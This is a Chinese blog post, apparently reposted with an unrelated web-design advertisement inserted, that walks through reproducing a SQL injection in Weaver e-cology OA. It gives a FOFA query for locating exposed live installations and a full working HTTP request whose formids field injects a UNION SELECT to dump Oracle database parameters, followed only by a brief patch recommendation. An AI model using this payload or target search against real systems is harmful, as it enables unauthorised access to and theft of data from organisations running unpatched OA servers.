這篇文章給大家介紹e-cology OA前臺(tái)SQL注入漏洞復(fù)現(xiàn)是怎樣的,內(nèi)容非常詳細(xì),感興趣的小伙伴們可以參考借鑒,希望對(duì)大家能有所幫助。
成都創(chuàng)新互聯(lián)公司長期為上千余家客戶提供的網(wǎng)站建設(shè)服務(wù),團(tuán)隊(duì)從業(yè)經(jīng)驗(yàn)10年,關(guān)注不同地域、不同群體,并針對(duì)不同對(duì)象提供差異化的產(chǎn)品和服務(wù);打造開放共贏平臺(tái),與合作伙伴共同營造健康的互聯(lián)網(wǎng)生態(tài)環(huán)境。為文山州企業(yè)提供專業(yè)的成都網(wǎng)站制作、成都網(wǎng)站設(shè)計(jì),文山州網(wǎng)站改版等技術(shù)服務(wù)。擁有10多年豐富建站經(jīng)驗(yàn)和眾多成功案例,為您定制開發(fā)。
0x00 簡介
e-cology 提供了移動(dòng)辦公、微信辦公、協(xié)同辦公(OA)、流程管理、信息門戶、知識(shí)管理、費(fèi)控管理等功能,適用于手機(jī)和pc端,是當(dāng)今比較主流的OA系統(tǒng)之一。
0x01 原理概述
該漏洞是由于OA系統(tǒng)的WorkflowCenterTreeData接口在收到用戶輸入的時(shí)候未進(jìn)行安全過濾,oracle數(shù)據(jù)庫傳入惡意SQL語句,導(dǎo)致SQL漏洞。
0x02 影響范圍
使用oracle數(shù)據(jù)庫的泛微 e-cology OA 系統(tǒng)
0x03 環(huán)境搭建
在線環(huán)境(限今晚):
打賞(任意金額)+轉(zhuǎn)發(fā),聯(lián)系作者獲取
FOFA搜索:
app="泛微-協(xié)同辦公OA"
自行搭建:
公眾號(hào)內(nèi)回復(fù)“泛微環(huán)境”
0x04 漏洞利用
找到oracle數(shù)據(jù)庫的泛微OA系統(tǒng)后直接使用Poc(已公開)
如果不存在漏洞,則顯示結(jié)果如下
如果漏洞存在,則會(huì)直接回顯很多數(shù)據(jù)
簡潔版Poc如下:(勿用于非法途徑)
POST /mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333 HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 2236
Connection: close
Upgrade-Insecure-Requests: 1
formids=11111111111)))%0a%0dunion select NULL,value from v$parameter order by (((1
0x05 修復(fù)建議
官網(wǎng)已更新補(bǔ)丁,請(qǐng)盡快更新。
關(guān)于e-cology OA前臺(tái)SQL注入漏洞復(fù)現(xiàn)是怎樣的就分享到這里了,希望以上內(nèi)容可以對(duì)大家有一定的幫助,可以學(xué)到更多知識(shí)。如果覺得文章不錯(cuò),可以把它分享出去讓更多的人看到。